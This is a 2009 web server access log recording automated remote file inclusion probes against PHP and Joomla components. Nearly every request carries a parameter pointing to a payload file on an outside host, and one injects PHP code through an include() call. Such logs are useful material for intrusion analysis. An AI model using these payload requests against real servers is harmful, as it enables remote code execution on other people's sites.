216.153.214.235 - - [04/Jan/2009:08:41:05 -0800] "GET /logs/access_080507.log/index.php?base_dir=http://rostrum56.ingeraldton.com/mutcp/read.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:41:06 -0800] "GET /new/bbs//include/write.php?dir=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.25.255.194 - - [04/Jan/2009:08:41:10 -0800] "GET /logs/errors.php?error=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:08:41:12 -0800] "GET /logs/access_080223.log///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
198.54.202.214 - - [04/Jan/2009:08:41:12 -0800] "GET /logs/access_071222.log/errors.php?error=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
198.54.202.234 - - [04/Jan/2009:08:41:12 -0800] "GET /errors.php?error=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.85.45.146 - - [04/Jan/2009:08:41:14 -0800] "GET /logs/access_080228.log/index.php?redir=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:08:41:19 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:41:26 -0800] "GET /logs/access_080802.log//index.php?DOCUMENT_ROOT=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:08:41:26 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:08:41:27 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:08:41:28 -0800] "GET /logs///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:41:34 -0800] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
218.232.109.160 - - [04/Jan/2009:08:41:54 -0800] "GET /logs/pixlie.php?root=http://www.mouche.be/components/com_banners/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.232.109.160 - - [04/Jan/2009:08:41:54 -0800] "GET /pixlie.php?root=http://www.mouche.be/components/com_banners/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.181.74 - - [04/Jan/2009:08:41:58 -0800] "GET /logs/access_080228.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.csjh.tpc.edu.tw/~sw/board/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:42:13 -0800] "GET /logs/access_071129.log/index.php?pg=http://www.projectsuper.ru/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:42:13 -0800] "GET /index.php?pg=http://www.projectsuper.ru/robots.txt?? HTTP/1.1" 200 94666 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:08:42:14 -0800] "GET /logs/pixlie.php?root=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:08:42:14 -0800] "GET /pixlie.php?root=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:42:16 -0800] "GET /logs/index.php?pg=http://www.projectsuper.ru/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:08:42:39 -0800] "GET /logs/pixlie.php?root=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:08:42:39 -0800] "GET /pixlie.php?root=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:42:40 -0800] "GET /logs/access_080321.log/index.php?pg=http://www.projectsuper.ru/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
62.127.253.111 - - [04/Jan/2009:08:43:32 -0800] "GET /logs/access_080421.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.recantodossabidinhos.com.br//imagens/ctrl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.127.253.111 - - [04/Jan/2009:08:43:32 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.recantodossabidinhos.com.br//imagens/ctrl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.127.253.111 - - [04/Jan/2009:08:43:32 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.recantodossabidinhos.com.br//imagens/ctrl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.127.253.111 - - [04/Jan/2009:08:43:32 -0800] "GET /logs/access_080509.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.recantodossabidinhos.com.br//imagens/ctrl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.145.162.155 - - [04/Jan/2009:08:43:53 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.145.162.155 - - [04/Jan/2009:08:43:54 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 200 95078 "-" "libwww-perl/5.803" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:08:43:54 -0800] "GET /logs/access_080227.log//poll/png.php?include_path=http://www.viparenda.ru/includes/images/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:08:43:55 -0800] "GET /poll/png.php?include_path=http://www.viparenda.ru/includes/images/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:08:43:55 -0800] "GET /logs//poll/png.php?include_path=http://www.viparenda.ru/includes/images/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.34.184.239 - - [04/Jan/2009:08:44:24 -0800] "GET /logs/access_081118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.127.253.111 - - [04/Jan/2009:08:44:31 -0800] "GET /logs/access_080514.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.recantodossabidinhos.com.br//imagens/ctrl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:44:35 -0800] "GET /logs/access_081114.log/phphtml.php?htmlclass_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:44:37 -0800] "GET /logs/access_081114.log/phphtml.php?htmlclass_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.136 - - [04/Jan/2009:08:44:40 -0800] "GET /logs/access_081114.log/index.php?pag=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:08:45:22 -0800] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:45:29 -0800] "GET //codebb/lang_select?phpbb_root_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:08:45:33 -0800] "GET //calendar.php?l=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:45:35 -0800] "GET /index.php?mosConfig_absolute_path=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 200 94873 "-" "libwww-perl/5.805" "www.dmulk.com"
82.145.162.155 - - [04/Jan/2009:08:45:49 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.145.162.155 - - [04/Jan/2009:08:45:50 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 200 95085 "-" "libwww-perl/5.803" "www.dmulk.com"
82.145.162.155 - - [04/Jan/2009:08:46:10 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.145.162.155 - - [04/Jan/2009:08:46:11 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 200 95064 "-" "libwww-perl/5.803" "www.dmulk.com"
66.135.56.104 - - [04/Jan/2009:08:46:24 -0800] "GET /logs/access_081118.log/errors.php?error=http://portal.morpace.com/portal/demo/templates/id5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:46:27 -0800] "GET /logs/access_080530.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.198.92.34 - - [04/Jan/2009:08:46:27 -0800] "GET /logs/access_080426.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.caverna.kit.net/z1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:46:28 -0800] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.106.16.155 - - [04/Jan/2009:08:46:30 -0800] "GET /cmpro_header.inc.php?cm_ext_server=http://www.salvationthroughgrace.com/Ephesians/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [04/Jan/2009:08:46:30 -0800] "GET /logs/access_080907.log/cmpro_header.inc.php?cm_ext_server=http://www.salvationthroughgrace.com/Ephesians/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [04/Jan/2009:08:46:30 -0800] "GET /logs/cmpro_header.inc.php?cm_ext_server=http://www.salvationthroughgrace.com/Ephesians/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [04/Jan/2009:08:46:37 -0800] "GET /logs/access_080629.log/cmpro_header.inc.php?cm_ext_server=http://www.salvationthroughgrace.com/Ephesians/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:46:39 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:46:39 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.154.16.128 - - [04/Jan/2009:08:47:03 -0800] "GET /logs/access_080503.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.hassenrasool.com/shop/bod.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.154.16.128 - - [04/Jan/2009:08:47:03 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.hassenrasool.com/shop/bod.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.154.16.128 - - [04/Jan/2009:08:47:03 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.hassenrasool.com/shop/bod.do%0D?? HTTP/1.1" 200 95148 "-" "libwww-perl/5.811" "www.dmulk.com"
81.176.226.164 - - [04/Jan/2009:08:47:13 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
81.176.226.164 - - [04/Jan/2009:08:47:13 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
81.176.226.164 - - [04/Jan/2009:08:47:13 -0800] "GET /logs/access_080522.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
207.154.16.128 - - [04/Jan/2009:08:47:16 -0800] "GET /logs/access_080925.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.hassenrasool.com/shop/bod.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.176.226.164 - - [04/Jan/2009:08:47:36 -0800] "GET /logs/access_080524.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
66.249.73.140 - - [04/Jan/2009:08:47:48 -0800] "GET /retreat1/holidays/ HTTP/1.1" 200 1267 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
85.233.166.227 - - [04/Jan/2009:08:47:49 -0800] "GET /logs///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.233.166.227 - - [04/Jan/2009:08:47:49 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.233.166.227 - - [04/Jan/2009:08:47:55 -0800] "GET /logs/access_080609.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.233.166.227 - - [04/Jan/2009:08:47:56 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.233.166.227 - - [04/Jan/2009:08:47:56 -0800] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.181.74 - - [04/Jan/2009:08:47:57 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.csjh.tpc.edu.tw/~sw/board/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.181.74 - - [04/Jan/2009:08:47:57 -0800] "GET /logs/access_080705.log//config/dbutil.bck.php?confdir=http://www.csjh.tpc.edu.tw/~sw/board/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.181.74 - - [04/Jan/2009:08:47:57 -0800] "GET /config/dbutil.bck.php?confdir=http://www.csjh.tpc.edu.tw/~sw/board/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.181.74 - - [04/Jan/2009:08:47:57 -0800] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://www.csjh.tpc.edu.tw/~sw/board/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:08:47:57 -0800] "GET /logs/access_080523.log///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:48:36 -0800] "GET /logs/access_081111.log//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:48:36 -0800] "GET /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:48:37 -0800] "GET /logs//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.154.16.128 - - [04/Jan/2009:08:48:49 -0800] "GET /logs/access_080523.log/components/com_forum/download.php?phpbb_root_path=http://www.hassenrasool.com/shop/bod.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.154.16.128 - - [04/Jan/2009:08:48:49 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.hassenrasool.com/shop/bod.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.154.16.128 - - [04/Jan/2009:08:48:49 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.hassenrasool.com/shop/bod.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:49:01 -0800] "GET /logs/access_080910.log//myPHPCalendar/admin.php?cal_dir=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:49:01 -0800] "GET /myPHPCalendar/admin.php?cal_dir=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:49:01 -0800] "GET /logs//myPHPCalendar/admin.php?cal_dir=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.233.166.227 - - [04/Jan/2009:08:49:12 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:49:23 -0800] "GET /logs/access_080603.log//myPHPCalendar/admin.php?cal_dir=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.145.162.155 - - [04/Jan/2009:08:49:25 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.145.162.155 - - [04/Jan/2009:08:49:26 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 200 95055 "-" "libwww-perl/5.803" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:49:30 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:49:34 -0800] "GET /logs///canal.php?meio=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:49:35 -0800] "GET //canal.php?meio=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:49:36 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:50:01 -0800] "GET /logs/access_080502.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:50:02 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.154.16.128 - - [04/Jan/2009:08:50:02 -0800] "GET /logs/access_080512.log/components/com_forum/download.php?phpbb_root_path=http://www.hassenrasool.com/shop/bod.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:50:02 -0800] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:50:07 -0800] "GET /logs//index.php?mosConfig_absolute_path=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:50:08 -0800] "GET /index.php?mosConfig_absolute_path=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 200 94857 "-" "libwww-perl/5.805" "www.dmulk.com"
62.127.253.111 - - [04/Jan/2009:08:50:11 -0800] "GET /logs/access_080421.log%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.recantodossabidinhos.com.br//imagens/ctrl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:50:11 -0800] "GET /logs/access_080912.log//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:50:12 -0800] "GET /logs/access_080503.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:50:12 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:50:13 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 200 95155 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:50:20 -0800] "GET /logs/access_080503.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:50:20 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:50:20 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 200 95139 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:50:23 -0800] "GET /logs/access_080925.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
216.246.20.140 - - [04/Jan/2009:08:50:23 -0800] "GET /logs/access_080201.log//about.php?inc_dir=http://62.94.24.124/cerignola/home/CuteNews/...??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.20.140 - - [04/Jan/2009:08:50:23 -0800] "GET /logs//about.php?inc_dir=http://62.94.24.124/cerignola/home/CuteNews/...??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
